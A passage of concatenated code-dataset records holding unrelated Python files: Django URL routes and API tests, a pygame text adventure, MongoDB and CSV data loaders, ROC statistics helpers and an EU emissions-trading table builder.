"src/geoviz.py", "file_name": "geoviz.py", "file_ext": "py", "file_size_in_byte": 4254, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.isfile", "line_number": 13, "usage_type": "call"}, {"api_name": "os.path", "line_number": 13, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 18, "usage_type": "attribute"}, {"api_name": "getopt.getopt", "line_number": 20, "usage_type": "call"}, {"api_name": "cli.shortoptions", "line_number": 20, "usage_type": "attribute"}, {"api_name": "cli.longoptions", "line_number": 20, "usage_type": "attribute"}, {"api_name": "cli.options_corres.keys", "line_number": 45, "usage_type": "call"}, {"api_name": "cli.options_corres", "line_number": 45, "usage_type": "attribute"}, {"api_name": "cli.options_corres", "line_number": 46, "usage_type": "attribute"}, {"api_name": "cli.version", "line_number": 64, "usage_type": "attribute"}, {"api_name": "cli.options_info", "line_number": 71, "usage_type": "attribute"}, {"api_name": "sys.argv", "line_number": 76, "usage_type": "attribute"}, {"api_name": "step.geolog.Geolog", "line_number": 87, "usage_type": "call"}, {"api_name": "step.geolog", "line_number": 87, "usage_type": "name"}, {"api_name": "solver.dispatch.instanciate_solver", "line_number": 96, "usage_type": "call"}, {"api_name": "solver.dispatch", "line_number": 96, "usage_type": "name"}, {"api_name": "html.escape", "line_number": 108, "usage_type": "call"}, {"api_name": "os.system", "line_number": 115, "usage_type": "call"}, {"api_name": "step.solverviz.SolverViz", "line_number": 122, "usage_type": "call"}, {"api_name": "step.solverviz", "line_number": 122, "usage_type": "name"}, {"api_name": "os.system", "line_number": 131, "usage_type": "call"}]} +{"seq_id": "24968508661", "text": "from django.urls import path\n\nfrom . import views\n\nurlpatterns = [\n path('mascaras//', views.mostrar_mascara, name='mostrar_mascara'),\n path('mascaras/alteracao///', views.mostrar_mascara_adaptada, name='mostrar_mascara_adaptada'),\n\n path('mascaras/diagnosticos//', views.mostrar_mascara_builder, name='mostrar_mascara_buider'),\n path('mascaras/nova', views.nova_mascara, name='nova_mascara'),\n path('premium', views.premium, name='premium'),\n path('pagamento/', views.pagamento, name='pagamento'),\n path('vencimento/', views.vencimento, name='vencimento'),\n path('pagamento/aprovado/', views.pagamento_aprovado, name='pagamento_aprovado'),\n path('pagamento/recusado/', views.pagamento_recusado, name='pagamento_recusado'),\n path('pagamento/pendente/', views.pagamento_pendente, name='pagamento_pendente'),\n\n path('mascaras/copiar', views.copiar_mascaras, name='copiar_mascaras'),\n\n path('mascaras/nova/adicionar', views.adicionar_nova_mascara, name='adicionar_nova_mascara'),\n path('', views.entrar, name='entrar'),\n path('login', views.login_usuario, name='login_usuario'),\n path('cadastrar', views.cadastrar, name='cadastrar'),\n path('voucher', views.voucher, name='voucher'),\n\n path('logout', views.logout_usuario, name='logout_usuario'),\n path('mascaras', views.mostrar_mascaras, name='mostrar_mascaras'),\n path('salvaralteracao/', views.adicionar_alteracao, name='adicionar_alteracao'),\n path('mascaras/variaveis/adicionar', views.adicionar_variaveis, name='adicionar_variaveis'),\n path('configuracoes', views.configuracoes, name='configuracoes'),\n path('configuracoes/editarmascara//', views.editar_mascara, name='editar_mascara'),\n path('copiar_tudo//', views.copiar_tudo, name='copiar_tudo'),\n\n path('configuracoes/editarmascara//salvar', views.salvar_edicao, name='salvar_edicao'),\n path('configuracoes/editaralteracao///', views.editar_alteracao, name='editar_alteracao'),\n path('alteracao/salvaralteracao', views.salvar_alteracao, name='salvar_alteracao'),\n path('upvote/', views.upvote_frase, name='upvote_frase'),\n path('users/validate//', views.activate, name='activate'),\n path('resetarpwd/', views.resetar_password, name='resetar_password'),\n path('linkreset/', views.link_reset, name='link_reset'),\n path('users/resetpwd//', views.resetar_password_confirm, name='resetar_password_confirm'),\n path('confirmarreset//', views.confirmar_reset, name='confirmar_reset'),\n path('ajuda', views.sobre, name='sobre'),\n path('salvarconfiguracoes', views.salvar_configuracoes, name='salvar_configuracoes'),\n path('configuracoes/excluirmascara//', views.excluir_mascara, name='excluir_mascara'),\n path('configuracoes/excluiralteracao//', views.excluir_alteracao, name='excluir_alteracao'),\n path('sobre/descricao', views.descricao, name='descricao'),\n path('eula', views.termos, name='termos'),\n path('quemsomos', views.quemsomos, name='quemsomos'),\n path('compendio', views.comunidade, name='comunidade'),\n path('entrar', views.mostrar_index, name='mostrar_index'),\n path('contato/anonimo', views.contato, name='contato'),\n path('contato', views.contato_login, name='contato_login'),\n path('enviarmensagem', views.enviar_mensagem, name='enviar_mensagem'),\n path('compendio/copiar/alteracao////', views.copiar_alteracao, name='copiar_alteracao')\n\n]\n", "repo_name": "netofarthur/laudario", "sub_path": "laudario/masks/urls.py", "file_name": "urls.py", "file_ext": "py", "file_size_in_byte": 3708, "program_lang": "python", "lang": "gl", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.path", "line_number": 6, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 7, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 9, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 10, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 11, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 12, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 13, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 14, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 15, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 16, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 18, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 20, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 21, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 22, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 23, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 24, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 26, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 27, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 28, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 29, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 30, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 31, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 32, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 34, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 35, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 36, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 37, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 38, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 39, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 40, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 41, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 42, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 43, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 44, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 45, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 46, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 47, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 48, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 49, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 50, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 51, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 52, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 53, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 54, "usage_type": "call"}, {"api_name": "django.urls.path", "line_number": 55, "usage_type": "call"}]} +{"seq_id": "4443633808", "text": "#!/usr/bin/python3\n\nfrom rpg_characters import Player\nimport rpg_figures as rpf\nfrom art import *\nimport pygame\nimport os\n\npygame.init()\npygame.font.init()\npygame.mixer.init()\n\ns = 'sound'\nstart_room_int = \"Hall\"\n\n\nclass Game:\n def __init__(self, start_room: str):\n self.player = Player(start_room)\n self.audio_off = False\n self.game_music = pygame.mixer.music\n\n def switch_music(self):\n\n if self.player.room.this_room == \"Catacombs\" or self.player.room.this_room == \"Pagan Altar\":\n location_audio = \"Sewer-Monsters-Town-Hall-Meeting_Looping.mp3\"\n self.game_music.stop()\n self.game_music.unload()\n elif self.player.room.this_room == \"Library\":\n location_audio = \"Closing-In_Looping.mp3\"\n self.game_music.stop()\n self.game_music.unload()\n else:\n print(\"we in the music\", self.player.room.this_room)\n location_audio = \"City-of-the-Disturbed_Looping.mp3\"\n\n self.game_music.load(os.path.join(s, location_audio))\n self.game_music.set_volume(0.15)\n self.game_music.play(-1)\n\n def toggle_audio(self):\n if not self.audio_off:\n self.game_music.fadeout(3)\n self.game_music.unload()\n return self.switch_music()\n else:\n return self.game_music.stop()\n\n def title_screen(self):\n self.game_music.load(os.path.join(s, \"Horror-Game-Intro.mp3\"))\n self.game_music.set_volume(0.15)\n self.game_music.play(-1)\n\n # print a main menu and the commands\n rpf.haunted_hill_house_render()\n tprint('''\n the\n haunting''', \"amcaaa01\")\n\n user_audio = input('To turn of audio type T + Enter, otherwise press Enter to begin: ').upper()\n\n if user_audio == 'T':\n self.audio_off = True\n self.toggle_audio()\n\n def game_loop_start(self):\n\n while True:\n self.player.show_status()\n\n # get the player's next 'move'\n # .split() breaks it up into an list array\n # eg typing 'go east' would give the list:\n # ['go','east']\n move = ''\n while move == '':\n move = input('>>> ')\n\n self.player.player_action(move)\n # self.switch_music()\n\n # Define how a player can win\n if self.player.room.this_room == 'Garden' and 'key' in self.player.inventory and \\\n 'potion' in self.player.inventory:\n print('You escaped the house with the ultra rare key and magic potion... YOU WIN!')\n break\n\n\ndef main():\n start_game = Game(start_room_int)\n start_game.title_screen()\n start_game.game_loop_start()\n\n\nif __name__ == '__main__':\n main()\n", "repo_name": "c23-repo/mycode", "sub_path": "rpg_game/rpg_game_starter.py", "file_name": "rpg_game_starter.py", "file_ext": "py", "file_size_in_byte": 2786, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pygame.init", "line_number": 9, "usage_type": "call"}, {"api_name": "pygame.font.init", "line_number": 10, "usage_type": "call"}, {"api_name": "pygame.font", "line_number": 10, "usage_type": "attribute"}, {"api_name": "pygame.mixer.init", "line_number": 11, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 11, "usage_type": "attribute"}, {"api_name": "rpg_characters.Player", "line_number": 19, "usage_type": "call"}, {"api_name": "pygame.mixer", "line_number": 21, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path", "line_number": 50, "usage_type": "attribute"}, {"api_name": "rpg_figures.haunted_hill_house_render", "line_number": 55, "usage_type": "call"}]} +{"seq_id": "25022558824", "text": "# This is just a simple mongo Connector used to\n# Fill a db \"olimpiadi\" with a collection named \"atleti\"\n# that contains all the atlethes from the CSV source file.\n\n# To run this script you can simply run from a terminal:\n# python import_athletes.py athletes_sochi.csv\n\nfrom pymongo import MongoClient\nclient = MongoClient('mongodb://localhost:27017/')\n\ndb = client.olimpiadi\n\n# DATA FORMAT\n# age,birthdate,gender,height,name,weight,\n# gold_medals,silver_medals,bronze_medals,\n# total_medals,sport,country\n\nwith open('athletes_sochi.csv', 'r') as file:\n for line in file.readlines():\n splitted = line.split(',')\n if splitted[0] != 'age':\n data = {'age':splitted[0],\n 'birthdate':splitted[1],\n 'gender':splitted[2],\n 'height':splitted[3],\n 'name':splitted[4],\n 'weight':splitted[5],\n 'gold_medals':int(splitted[6]),\n 'silver_medals':int(splitted[7]),\n 'bronze_medals':int(splitted[8]),\n 'total_medals':int(splitted[9]),\n 'sport':splitted[10],\n 'country':splitted[11][:-2]}\n db.atleti.insert(data)\n\n\n# Instead to use the python script we can also use MONGOIMPORT\n# provided by MongoDB itself:\n\n# mongoimport --db olimpiadi --collection atleti --file atleti.json\n\n# To export the entire collection we can use MONGOEXPORT:\n\n# mongoexport --db olimpiadi --collection atleti --out atleti.json\n", "repo_name": "mnazzario/BigDataAcademy", "sub_path": "development/07_MONGODB/import_atleti/import_athletes.py", "file_name": "import_athletes.py", "file_ext": "py", "file_size_in_byte": 1491, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pymongo.MongoClient", "line_number": 9, "usage_type": "call"}]} +{"seq_id": "34113456871", "text": "from collections import deque\r\nclass MovingAverage:\r\n # add the new val to sum, if nums size exceeds given size, pop and decrement by the first item\r\n def __init__(self, size: int):\r\n \"\"\"\r\n Initialize your data structure here.\r\n \"\"\"\r\n self.size = size\r\n self.nums = deque()\r\n self.sum = 0\r\n \r\n\r\n def next(self, val: int) -> float:\r\n if len(self.nums) < self.size:\r\n self.sum += val\r\n else:\r\n self.sum += val - self.nums.popleft()\r\n self.nums.append(val)\r\n return self.sum / len(self.nums)\r\n", "repo_name": "HaoboChen1887/leetcode", "sub_path": "design/346_moving_avergae_from_data_stream/346.py", "file_name": "346.py", "file_ext": "py", "file_size_in_byte": 598, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "collections.deque", "line_number": 9, "usage_type": "call"}]} +{"seq_id": "74783452004", "text": "import os\nimport numpy as np\nimport pandas as pd\nimport pickle\nfrom statistics.plot_roc import plot_roc\nfrom statistics.roc_bootstrap import roc_bootstrap\n\n\n\ndef roc_all(cls_task, level, bootstrap, color, save_dir, fn_df_pred):\n\n df_sum = pd.read_csv(os.path.join(save_dir, fn_df_pred))\n\n if level == 'img':\n y_true = df_sum[cls_task].to_numpy()\n y_pred = df_sum['y_pred'].to_numpy()\n print_info = 'roc image:'\n elif level == 'patient_mean_prob':\n df_mean = df_sum.groupby(['ID']).mean()\n y_true = df_mean[cls_task].to_numpy()\n y_pred = df_mean['y_pred'].to_numpy()\n print_info = 'roc patient prob:'\n elif level == 'patient_mean_pos':\n df_mean = df_sum.groupby(['ID']).mean()\n y_true = df_mean[cls_task].to_numpy()\n y_pred = df_mean['y_pred_class'].to_numpy()\n print_info = 'roc patient pos:'\n \n auc = plot_roc(\n save_dir=save_dir,\n y_true=y_true,\n y_pred=y_pred,\n level=level,\n color='blue'\n )\n ### calculate roc, tpr, tnr with 1000 bootstrap\n stat = roc_bootstrap(\n bootstrap=bootstrap,\n y_true=y_true,\n y_pred=y_pred\n )\n\n print(print_info)\n print(stat)\n\n return stat\n\n", "repo_name": "xmuyzz/DeepPLGG", "sub_path": "src/statistics/roc_all.py", "file_name": "roc_all.py", "file_ext": "py", "file_size_in_byte": 1250, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 5, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 12, "usage_type": "call"}, {"api_name": "os.path", "line_number": 12, "usage_type": "attribute"}, {"api_name": "statistics.plot_roc.plot_roc", "line_number": 29, "usage_type": "call"}, {"api_name": "statistics.roc_bootstrap.roc_bootstrap", "line_number": 37, "usage_type": "call"}]} +{"seq_id": "11518861045", "text": "#!/usr/bin/python\n# -*-coding:utf-8-*-\n\n# -*- coding: utf-8 -*-\nimport oss2,os\n\n# 阿里云主账号AccessKey拥有所有API的访问权限,风险很高。强烈建议您创建并使用RAM账号进行API访问或日常运维,请登录 https://ram.console.aliyun.com 创建RAM账号。\nauth = oss2.Auth('', '')\n# Endpoint以杭州为例,其它Region请按实际情况填写。\nbucket = oss2.Bucket(auth, 'http://oss-cn-hangzhou.aliyuncs.com', '')\n# 必须以二进制的方式打开文件,因为需要知道文件包含的字节数。\nwith open('', 'rb') as fileobj:\n # Seek方法用于指定从第1000个字节位置开始读写。上传时会从您指定的第1000个字节位置开始上传,直到文件结束。\n fileobj.seek(1000, os.SEEK_SET)\n # Tell方法用于返回当前位置。\n current = fileobj.tell()\n bucket.put_object('', fileobj)", "repo_name": "jiaziming/new-old", "sub_path": "day6-面向对象/11111.py", "file_name": "11111.py", "file_ext": "py", "file_size_in_byte": 956, "program_lang": "python", "lang": "zh", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "oss2.Auth", "line_number": 8, "usage_type": "call"}, {"api_name": "oss2.Bucket", "line_number": 10, "usage_type": "call"}, {"api_name": "os.SEEK_SET", "line_number": 14, "usage_type": "attribute"}]} +{"seq_id": "31153033949", "text": "\"\"\"\nTest Recipe API\n\"\"\"\nfrom decimal import Decimal\n\nfrom django.contrib.auth import get_user_model\nfrom django.test import TestCase\nfrom django.urls import reverse\n\nfrom rest_framework import status\nfrom rest_framework.test import APIClient\n\nfrom core.models import Recipe\n\nfrom recipe.serializers import RecipeSerializer\n\nRECIPES_URL = reverse('recipe:recipe-list')\n\n\ndef create_recipe(user, **params):\n \"\"\"Create and return recipe\"\"\"\n defaults = {\n \"title\": \"Sample recipe title\",\n \"description\": \"Sample recipe description\",\n \"time_minutes\": 22,\n \"price\": Decimal(\"5.25\"),\n \"link\": \"http://example.come/recipe.pdf\",\n }\n defaults.update(params)\n\n recipe = Recipe.objects.create(user=user, **defaults)\n\n return recipe\n\n\nclass PublicRecipeAPITests(TestCase):\n \"\"\"Test unauthenticated API request.\"\"\"\n\n def setUp(self):\n self.client = APIClient()\n\n def test_auth_required(self):\n \"\"\"Test auth is required to call API\"\"\"\n res = self.client.get(RECIPES_URL)\n\n self.assertEquals(res.status_code, status.HTTP_401_UNAUTHORIZED)\n\n\nclass PrivateRecipeAPITest(TestCase):\n \"\"\"Test for authenticated request\"\"\"\n\n def setUp(self):\n self.client = APIClient()\n self.user = get_user_model().objects.create_user(\n 'user@mail.com',\n 'userpassword',\n )\n self.client.force_authenticate(self.user)\n\n def test_retrive_recipes(self):\n \"\"\"Test retrieveing list of recipes.\"\"\"\n create_recipe(user=self.user)\n create_recipe(user=self.user)\n\n res = self.client.get(RECIPES_URL)\n\n recipes = Recipe.objects.all().order_by('-id')\n serializer = RecipeSerializer(recipes, many=True)\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(res.data, serializer.data)\n\n def test_recipe_list_limited_to_user(self):\n \"\"\"Test list of recipes is limited to authenticated user.\"\"\"\n other_user = get_user_model().objects.create_user(\n 'other@mail.com',\n 'otherpassword'\n )\n create_recipe(user=other_user)\n create_recipe(user=self.user)\n\n res = self.client.get(RECIPES_URL)\n\n recipes = Recipe.objects.filter(user=self.user)\n serializer = RecipeSerializer(recipes, many=True)\n self.assertEqual(res.status_code, status.HTTP_200_OK)\n self.assertEqual(res.data, serializer.data)\n", "repo_name": "ancel-c-miller/recipe-app-api", "sub_path": "app/recipe/tests/test_recipe_api.py", "file_name": "test_recipe_api.py", "file_ext": "py", "file_size_in_byte": 2453, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "django.urls.reverse", "line_number": 17, "usage_type": "call"}, {"api_name": "decimal.Decimal", "line_number": 26, "usage_type": "call"}, {"api_name": "recipe.serializers", "line_number": 31, "usage_type": "name"}, {"api_name": "core.models.Recipe.objects.create", "line_number": 31, "usage_type": "call"}, {"api_name": "core.models.Recipe.objects", "line_number": 31, "usage_type": "attribute"}, {"api_name": "core.models.Recipe", "line_number": 31, "usage_type": "name"}, {"api_name": "recipe.serializers", "line_number": 33, "usage_type": "name"}, {"api_name": "django.test.TestCase", "line_number": 36, "usage_type": "name"}, {"api_name": "rest_framework.test.APIClient", "line_number": 40, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_401_UNAUTHORIZED", "line_number": 46, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 46, "usage_type": "name"}, {"api_name": "django.test.TestCase", "line_number": 49, "usage_type": "name"}, {"api_name": "rest_framework.test.APIClient", "line_number": 53, "usage_type": "call"}, {"api_name": "django.contrib.auth.get_user_model", "line_number": 54, "usage_type": "call"}, {"api_name": "core.models.Recipe.objects.all", "line_number": 67, "usage_type": "call"}, {"api_name": "core.models.Recipe.objects", "line_number": 67, "usage_type": "attribute"}, {"api_name": "core.models.Recipe", "line_number": 67, "usage_type": "name"}, {"api_name": "recipe.serializers.RecipeSerializer", "line_number": 68, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 69, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 69, "usage_type": "name"}, {"api_name": "django.contrib.auth.get_user_model", "line_number": 74, "usage_type": "call"}, {"api_name": "core.models.Recipe.objects.filter", "line_number": 83, "usage_type": "call"}, {"api_name": "core.models.Recipe.objects", "line_number": 83, "usage_type": "attribute"}, {"api_name": "core.models.Recipe", "line_number": 83, "usage_type": "name"}, {"api_name": "recipe.serializers.RecipeSerializer", "line_number": 84, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 85, "usage_type": "attribute"}, {"api_name": "rest_framework.status", "line_number": 85, "usage_type": "name"}]} +{"seq_id": "10308019510", "text": "import pandas as pd\nimport numpy as np\nfrom datetime import datetime\nfrom .mappings import (\n map_registryCode_inv,\n map_account_type_inv,\n map_unitType_inv,\n map_registryCodes,\n export_mappings,\n)\nimport os\nimport glob\n\n\n# account information added by hand\nNEW_ACC = [\n {\n \"accountIDEutl\": 111264,\n \"name\": \"EU Credit Exchange Account - Aviation\",\n \"registry_id\": \"EU\",\n \"openingDate\": pd.to_datetime(\"2014-01-29\"),\n \"isOpen\": True,\n \"accountType_id\": \"100-23\",\n },\n {\n \"accountIDEutl\": 111265,\n \"name\": \"EU Credit Exchange Account - Aviation\",\n \"registry_id\": \"EU\",\n \"openingDate\": pd.to_datetime(\"2014-01-29\"),\n \"isOpen\": True,\n \"accountType_id\": \"100-23\",\n },\n {\n \"accountIDEutl\": 111267,\n \"name\": \"EU Credit Exchange Account\",\n \"registry_id\": \"EU\",\n \"openingDate\": pd.to_datetime(\"2014-01-29\"),\n \"isOpen\": True,\n \"accountType_id\": \"100-23\",\n },\n {\n \"accountIDEutl\": 111266,\n \"name\": \"EU Credit Exchange Account\",\n \"registry_id\": \"EU\",\n \"openingDate\": pd.to_datetime(\"2014-01-29\"),\n \"isOpen\": True,\n \"accountType_id\": \"100-23\",\n },\n]\n\n\ndef create_csv_tables(\n dir_in, dir_out, fn_coordinates=None, fn_nace=None, fn_nace_codes=None\n):\n \"\"\"Create all tables\n :param dir_in: directory with parsed data\n :param dir_out: output directory\n :param fn_coordinates: path to file with installation coordinates\n :param fn_nace: name of file with nace codes for installations\n if None, NACE codes are not processed\n :param fn_nace_codes: name of file with nace classification scheme\n If None, classification lookup not exported\n \"\"\"\n print(\"####### Create lookup tables\")\n create_tables_lookup(dir_in, dir_out, fn_nace_codes=fn_nace_codes)\n\n print(\"####### Create installation tables\")\n create_table_installation(\n dir_in, dir_out, fn_coordinates=fn_coordinates, fn_nace=fn_nace\n )\n create_table_compliance(dir_in, dir_out)\n create_table_surrender(dir_in, dir_out)\n\n print(\"####### Create account tables\")\n create_table_accountHolder(dir_in, dir_out)\n create_table_account(dir_in, dir_out)\n\n print(\"####### Create transcation tables\")\n create_table_transaction(dir_in, dir_out)\n\n print(\"####### Add ESD information\")\n create_esd_tables(dir_in, dir_out, save_data=True)\n\n\ndef create_esd_tables(dir_in, dir_out, save_data=True):\n \"\"\"Adds esd information to existing tables and creates esd\n compliance table\n :param dir_in: directory with parsed esd data as provided by spider\n :param dir_out: directory with final csv files\n :param save_data: save data to csv\n \"\"\"\n # -----------------------------------------------------------\n # load data\n fn_trans = dir_in + \"esdTransactions.csv\"\n fn_trans_blocks = dir_in + \"esdTransactionBlocks.csv\"\n fn_compliance = dir_in + \"esdCompliance.csv\"\n\n df_t = pd.read_csv(fn_trans, parse_dates=[\"transactionDate\"])\n df_tb = pd.read_csv(fn_trans_blocks, parse_dates=[\"transactionDate\"])\n df_c = pd.read_csv(fn_compliance)\n df_acc_euets = pd.read_csv(dir_out + \"accounts.csv\", low_memory=False)\n df_acc_holder_euets = pd.read_csv(dir_out + \"accountHolders.csv\")\n df_projects_euets = pd.read_csv(dir_out + \"offset_projects.csv\")\n df_trans_euets = pd.read_csv(dir_out + \"transactionBlocks.csv\")\n df_comp_euets = pd.read_csv(dir_out + \"compliance.csv\", low_memory=False)\n df_surr_euets = pd.read_csv(dir_out + \"surrender.csv\")\n df_inst_euets = pd.read_csv(dir_out + \"installations.csv\", dtype={\"nace_id\": \"str\"})\n\n # determine maximum account ids etc for id management\n # TODO move that to database creation and let postgres figure out ids?\n max_holder_id = df_acc_holder_euets[\"id\"].max()\n max_acc_id = df_acc_euets[\"accountIDEutl\"].max()\n max_trans_id = df_trans_euets[\"id\"].max()\n map_unitType = (\n pd.read_csv(dir_out + \"unitTypeCodes.csv\")\n .set_index(\"description\")[\"id\"]\n .to_dict()\n )\n map_unitType.update({\"Annual Emission Allocation Unit\": \"AEA\"})\n # -----------------------------------------------------------\n # create account table\n # the ESD does not directly report accounts. In fact, each member state has\n # one account for each year of compliance. In addition, there are account to\n # manage the ESD.\n # To stay consistent with the general data model, we create ESD accounts\n # based on (a) ESD compliance tables and (b) ESD transactions\n # (a) get accounts from compliance table\n df_acc = df_c[\n [\"accountIdentifier\", \"accountStatus\", \"memberState\"]\n ].drop_duplicates()\n df_ = df_c.accountIdentifier.str.split(\"-\", expand=True)\n df_acc[\"tradingSystem\"] = df_[0]\n df_acc[\"yearValid\"] = df_[2].astype(\"int\")\n\n # (b) accounts from transaction table\n accs = list(df_acc.accountIdentifier.unique())\n df_t_acc = pd.concat(\n [\n (\n df_t.query(f\"transferringAccountIdentifier not in {accs}\")[\n [\"transferringAccountIdentifier\", \"transferringMemberState\"]\n ].rename(\n columns={\n \"transferringAccountIdentifier\": \"accountIdentifier\",\n \"transferringMemberState\": \"memberState\",\n }\n )\n ),\n (\n df_t.query(f\"acquiringAccountIdentifier not in {accs}\")[\n [\"acquiringAccountIdentifier\", \"acquiringMemberState\"]\n ].rename(\n columns={\n \"acquiringAccountIdentifier\": \"accountIdentifier\",\n \"acquiringMemberState\": \"memberState\",\n }\n )\n ),\n ]\n ).drop_duplicates()\n\n def extract_ets_system(x):\n if x.split(\"-\")[0].startswith(\"ESD\"):\n return \"ESD\"\n return np.nan\n\n df_t_acc[\"tradingSystem\"] = df_t_acc.accountIdentifier.map(extract_ets_system)\n # for account not in the ESD, try to find an already existing account in the EUETS\n search_in_euets = df_t_acc[\n pd.isnull(df_t_acc.tradingSystem)\n ].accountIdentifier.to_list()\n map_euets_account = (\n df_acc_euets[\n (df_acc_euets.name.notnull()) & (df_acc_euets.name.isin(search_in_euets))\n ]\n .set_index(\"name\")[\"accountIDEutl\"]\n .to_dict()\n )\n df_t_acc = df_t_acc[~df_t_acc.accountIdentifier.isin(search_in_euets)]\n df_t_acc.memberState = \"EU\"\n\n df_acc = pd.concat([df_acc, df_t_acc]).rename(\n columns={\"accountIdentifier\": \"accountID\"}\n )\n\n # -----------------------------------------------------------\n # create account holder table\n # for accounts with member state, use the member state\n # else use the account name as account holder name\n df_acc_holder = df_acc[df_acc.memberState.notnull()][\n \"memberState\"\n ].drop_duplicates()\n df_ = df_acc[df_acc.memberState.isnull()][\"accountID\"].drop_duplicates()\n df_acc_holder = pd.concat([df_acc_holder, df_]).to_frame(\"name\")\n df_acc_holder[\"id\"] = list(\n max_holder_id + i for i in range(1, len(df_acc_holder) + 1)\n )\n\n # establish foreign key in account table\n map_acc_holder = dict(zip(df_acc_holder.name, df_acc_holder.id))\n df_acc[\"accountHolder_id\"] = df_acc.memberState.map(lambda x: map_acc_holder.get(x))\n df_acc.loc[df_acc.accountHolder_id.isnull(), \"accountHolder_id\"] = df_acc.loc[\n df_acc.accountHolder_id.isnull(), \"accountID\"\n ].map(lambda x: map_acc_holder.get(x))\n df_acc.accountHolder_id = df_acc.accountHolder_id.astype(\"int\")\n\n # create primary key for account table\n df_acc[\"accountIDEutl\"] = list(max_acc_id + i for i in range(1, len(df_acc) + 1))\n\n # rename to be consistent with existing table\n df_acc = df_acc.rename(\n columns={\n \"accountIDEutl\": \"accountIDEutl\",\n \"accountID\": \"accountIDESD\",\n \"accountStatus\": \"isOpen\",\n \"memberState\": \"registry_id\",\n \"tradingSystem\": \"tradingSystem\",\n \"yearValid\": \"yearValid\",\n \"accountHolder_id\": \"accountHolder_id\",\n }\n )\n df_acc.isOpen = ~(df_acc.isOpen == \"closed\")\n mask = df_acc.accountIDESD.str.startswith(\"ESD\") & df_acc.registry_id.isnull()\n df_acc.loc[mask, \"registry_id\"] = \"ESD\"\n df_acc[\"tradingSystem\"] = \"esd\"\n df_acc_holder[\"tradingSystem\"] = \"esd\"\n df_acc_holder[\"name\"] = \"Effort Sharing: \" + df_acc_holder[\"name\"].map(\n map_registryCodes\n )\n # we do not have an account name in the ESD, thus we create one equal to the\n # account identifier also add an account type\n df_acc[\"name\"] = df_acc.accountIDESD\n df_acc[\"accountType_id\"] = \"esd\"\n\n # -----------------------------------------------------------\n # compliance data\n df_c[\"surrendered\"] = df_c.surrenderedAea + df_c.surrenderedCredits\n df_c = df_c.merge(\n df_acc[[\"accountIDEutl\", \"accountIDESD\"]],\n left_on=\"accountIdentifier\",\n right_on=\"accountIDESD\",\n how=\"left\",\n )\n df_comp = df_c.rename(\n columns={\n \"accountIDEutl\": \"account_id\",\n \"compliance\": \"compliance_id\",\n \"memberState\": \"registry_id\",\n \"allocated\": 